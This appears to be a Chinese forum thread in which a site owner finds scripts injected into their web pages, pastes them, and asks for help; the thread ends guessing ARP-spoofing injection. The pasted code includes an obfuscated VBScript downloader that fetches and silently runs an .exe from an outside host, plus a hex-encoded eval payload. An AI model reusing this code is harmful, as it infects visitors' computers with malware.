1、你加了什么统计之类的js代码
2、IDC给你加的代码【免费空间灰常常见】
3、你文件在本地中毒后给上传上去的
4、你的服务器中毒哦
5、你当地的ISP给你推送的【电信经常干这事】

解决方案 »

  1.   

    1、你加了什么统计之类的js代码            没有加
    2、IDC给你加的代码【免费空间灰常常见】   不是免费空间,自己的服务器
    3、你文件在本地中毒后给上传上去的        本地文件查过没变
    4、你的服务器中毒哦                      这个可能性很大,不怎么如何检测
    5、你当地的ISP给你推送的【电信经常干这事】感觉不象
      

  2.   

    http://www.axgzba2.com/x/2.exe那些网页打开后发现是连接上这个文件,是个病毒文件,下载了马上杀毒软件就报警
      

  3.   

    <script language=VBScript>
    On Error Resume Next
    Cike = "http://www.axgzba2.com/x/2.exe"
    Set Cike2 = document.createElement("object")
    Cikeid="clsid:"
    Cikeidx="BD96"
    Cikeid2="C556-65"
    Cikeid3="A3-11D"
    Cikeid4="0-98"
    Cikeid5="3A-00C"
    Cikeid6="04FC29E36"
    Cike3="Microsoft.X"
    Cike4="MLHTTp"
    Cike2.SetAttribute "classid", Cikeid&Cikeidx&Cikeid2&Cikeid3&Cikeid4&Cikeid5&Cikeid6
    Cike5=Cike3&Cike4
    Set loveCike = Cike2.CreateObject(Cike5,"")
    loveCike.Open "GET", Cike, False
    loveCike.Send
    Qq_123456="microsofts.pif"
    Qq_123456s="microsofts.vbs"
    Q123456="Scripting."
    Q123456s="FileSyst"
    Q123456ss="emObject"
    Q123456sss="Adod"
    Q123456ssss="b.stream"
    Q123456sssss=Q123456sss&Q123456ssss
    Set chilam = Cike2.createobject(Q123456&Q123456s&Q123456ss,"")
    Set yingying = chilam.GetSpecialFolder(2)
    Qq_123456=chilam.BuildPath(yingying,Qq_123456)
    Qq_123456s=chilam.BuildPath(yingying,Qq_123456s)
    Set chilams = Cike2.createobject(Q123456sssss,"")
    chilams.type=1
    chilams.Open
    chilams.Write loveCike.ResponseBody
    chilams.Savetofile Qq_123456,2
    chilams.Close
    chilams.Type=2
    chilams.Open
    chilams.WriteText  "Set LoveCike = CreateObject(""Wscript.Shell"")"&vbCrLf&"LoveCike.run ("""&Qq_123456&""")"
    chilams.Savetofile Qq_123456s,2
    chilams.Close
    cute="Shell.Applica"
    qq="tion"
    Set cute_qq = Cike2.createobject(cute&qq,"")
    Qq123456="O"
    Qq123456s="p"
    Qq123456ss="e"
    Qq123456sss="n"
    cute_qq.SHellExECuTe Qq_123456s,"","",Qq123456&Qq123456s&Qq123456ss&Qq123456sss,0
    </script>
    <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
    <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
    看不懂这些代码了,不知道是那些神经弄来的
      

  4.   

    <SCRIPT LANGUAGE='JavaScript'> 
    function ResumeError() { 
    return true; 

    window.onerror = ResumeError; 
    </SCRIPT>
    <SCRIPT LANGUAGE="JAVASCRIPT">
    eval("\x65\x76\x61\x6c\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x65\x2c\x64\x29\x7b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x63\x29\x7b\x72\x65\x74\x75\x72\x6e\x28\x63\x3c\x61\x3f\x27\x27\x3a\x65\x28\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x63\x2f\x61\x29\x29\x29\x2b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x63\x2b\x32\x39\x29\x3a\x63\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x33\x36\x29\x29\x7d\x3b\x69\x66\x28\x21\x27\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5e\x2f\x2c\x53\x74\x72\x69\x6e\x67\x29\x29\x7b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x64\x5b\x65\x28\x63\x29\x5d\x3d\x6b\x5b\x63\x5d\x7c\x7c\x65\x28\x63\x29\x7d\x6b\x3d\x5b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x64\x5b\x65\x5d\x7d\x5d\x3b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x27\x5c\x5c\x77\x2b\x27\x7d\x3b\x63\x3d\x31\x7d\x3b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x69\x66\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x3d\x70\x2e\x72
    \x65\x70\x6e\x51\x75\x34\x38\x71\x75\x37\x70\x7c\x77\x68\x69\x6c\x65\x7c\x49\x6d\x70\x6f\x72\x74\x7c\x6c\x65\x6e\x67\x74\x68\x7c\x30\x38\x7c\x35\x34\x33\x7c\x61\x34\x7c\x37\x31\x7c\x35\x35\x30\x7c\x35\x34\x34\x7c\x35\x35\x32\x7c\x30\x31\x27\x2e\x73\x70\x6c\x69\x74\x28\x27\x7c\x27\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x0d\x0a")
    </script>病毒代码吗?谁有分析过啊?
      

  5.   

    window.onerror=function(){return true};
    document.write ('<script>var a9290tf="51la";var a9290pu="";var a9290pf="51la";var a9290su=window.location;var a9290sf=document.referrer;var a9290of="";var a9290op="";var a9290ops=1;var a9290ot=1;var a9290d=new Date();var a9290color="";if (navigator.appName=="Netscape"){a9290color=screen.pixelDepth;} else {a9290color=screen.colorDepth;}<\/script><script>a9290tf=top.document.referrer;<\/script><script>a9290pu =window.parent.location;<\/script><script>a9290pf=window.parent.document.referrer;<\/script><script>a9290ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a9290ops=(a9290ops==null)?1: (parseInt(unescape((a9290ops)[2]))+1);var a9290oe =new Date();a9290oe.setTime(a9290oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a9290ops+ ";path=/;expires="+a9290oe.toGMTString();a9290ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a9290ot==null){a9290ot=1;}else{a9290ot=parseInt(unescape((a9290ot)[2])); a9290ot=(a9290ops==1)?(a9290ot+1):(a9290ot);}a9290oe.setTime(a9290oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a9290ot+";path=/;expires="+a9290oe.toGMTString();<\/script><script>a9290of=a9290sf;if(a9290pf!=="51la"){a9290of=a9290pf;}if(a9290tf!=="51la"){a9290of=a9290tf;}a9290op=a9290pu;try{lainframe}catch(e){a9290op=a9290su;}document.write(\'<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?svid=37&id=1519290&tpages=\'+a9290ops+\'&ttimes=\'+a9290ot+\'&tzone=\'+(0-a9290d.getTimezoneOffset()/60)+\'&tcolor=\'+a9290color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a9290of)+\'&vpage=\'+escape(a9290op)+\'" \/>\');<\/script>');还弄些统计网站的代码,不是有人专门来整我吧
      

  6.   

    我那是个APACHE服务器 ,使用PHP,文件都没有被修改,不知道这木马程序是从那里修改那些网页呢?
      

  7.   

    看了下网上资料,好象是ARP病毒挂马了